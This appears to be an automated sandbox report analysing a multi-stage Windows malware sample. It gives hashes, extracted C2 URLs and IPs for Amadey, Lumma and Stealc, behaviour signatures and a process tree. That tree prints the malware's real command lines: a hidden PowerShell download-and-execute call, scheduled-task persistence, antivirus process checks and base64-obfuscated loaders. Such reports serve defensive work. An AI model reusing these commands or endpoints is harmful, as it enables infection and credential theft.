Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    30/03/2025, 14:42

General

  • Target

    2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    fbd874278e3584ab6be6a8c49bd7ba9d

  • SHA1

    2a83fce3a5f6da55d0cb7353e5a98aaac2c7fdc2

  • SHA256

    c8e1a3b7374bb21b906a034c52c5fd9350fa87e822956e3f8ad37bfdb5d9cb86

  • SHA512

    d7e66c87b6e871ccfe844f051ef9a0289849602fc759ba3b251ebf891000a1db282d9a7f2d3c9c328da9ed99fc85a593fe3933aa76cd7e0e8c98394d9868d1eb

  • SSDEEP

    24576:7qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:7TvC/MTQYxsWR7a0J

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://skynetxc.live/AksoPA

https://pixtreev.run/LkaUz

https://sparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://rodformi.run/aUosoz

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 11 IoCs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 16 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 40 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 6 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 30 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn x5DXVmaeQSa /tr "mshta C:\Users\Admin\AppData\Local\Temp\ewHn2PRd9.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2968
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn x5DXVmaeQSa /tr "mshta C:\Users\Admin\AppData\Local\Temp\ewHn2PRd9.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2768
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\ewHn2PRd9.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LBB64JPMTVRA08H7FOTR3OO1BCXPTBRU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2876
        • C:\Users\Admin\AppData\Local\TempLBB64JPMTVRA08H7FOTR3OO1BCXPTBRU.EXE
          "C:\Users\Admin\AppData\Local\TempLBB64JPMTVRA08H7FOTR3OO1BCXPTBRU.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2196
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:828
            • C:\Users\Admin\AppData\Local\Temp\10381930101\41e2069bb2.exe
              "C:\Users\Admin\AppData\Local\Temp\10381930101\41e2069bb2.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1944
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 1944 -s 64
                7⤵
                • Loads dropped DLL
                PID:2452
            • C:\Users\Admin\AppData\Local\Temp\10381940101\0ea4c1cf69.exe
              "C:\Users\Admin\AppData\Local\Temp\10381940101\0ea4c1cf69.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2176
            • C:\Users\Admin\AppData\Local\Temp\10381950101\EPTwCQd.exe
              "C:\Users\Admin\AppData\Local\Temp\10381950101\EPTwCQd.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:544
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 544 -s 28
                7⤵
                • Loads dropped DLL
                PID:696
            • C:\Users\Admin\AppData\Local\Temp\10381960101\e5c5e481b4.exe
              "C:\Users\Admin\AppData\Local\Temp\10381960101\e5c5e481b4.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:1948
            • C:\Users\Admin\AppData\Local\Temp\10381970101\u75a1_003.exe
              "C:\Users\Admin\AppData\Local\Temp\10381970101\u75a1_003.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2908
            • C:\Users\Admin\AppData\Local\Temp\10381980101\7IIl2eE.exe
              "C:\Users\Admin\AppData\Local\Temp\10381980101\7IIl2eE.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2824
              • C:\Windows\SysWOW64\CMD.exe
                "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                7⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2660
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2276
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "opssvc wrsa"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2000
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1864
                • C:\Windows\SysWOW64\findstr.exe
                  findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1636
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 418377
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1884
                • C:\Windows\SysWOW64\extrac32.exe
                  extrac32 /Y /E Leon.cab
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1528
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "BEVERAGES" Compilation
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1708
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2832
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2344
                • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                  Passwords.com N
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:2156
                • C:\Windows\SysWOW64\choice.exe
                  choice /d y /t 5
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1956
            • C:\Users\Admin\AppData\Local\Temp\10381990101\TbV75ZR.exe
              "C:\Users\Admin\AppData\Local\Temp\10381990101\TbV75ZR.exe"
              6⤵
              • Executes dropped EXE
              PID:1856
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 1856 -s 44
                7⤵
                • Loads dropped DLL
                PID:3056
            • C:\Users\Admin\AppData\Local\Temp\10382000101\Rm3cVPI.exe
              "C:\Users\Admin\AppData\Local\Temp\10382000101\Rm3cVPI.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2076
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10382011121\5YB5L4K.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1984
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10382011121\5YB5L4K.cmd"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1420
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2524
            • C:\Users\Admin\AppData\Local\Temp\10382020101\kO2IdCz.exe
              "C:\Users\Admin\AppData\Local\Temp\10382020101\kO2IdCz.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              PID:2220
              • C:\Windows\system32\cmd.exe
                cmd.exe /c 67e8f4de3ad1d.vbs
                7⤵
                  PID:904
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
                    8⤵
                      PID:2392
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@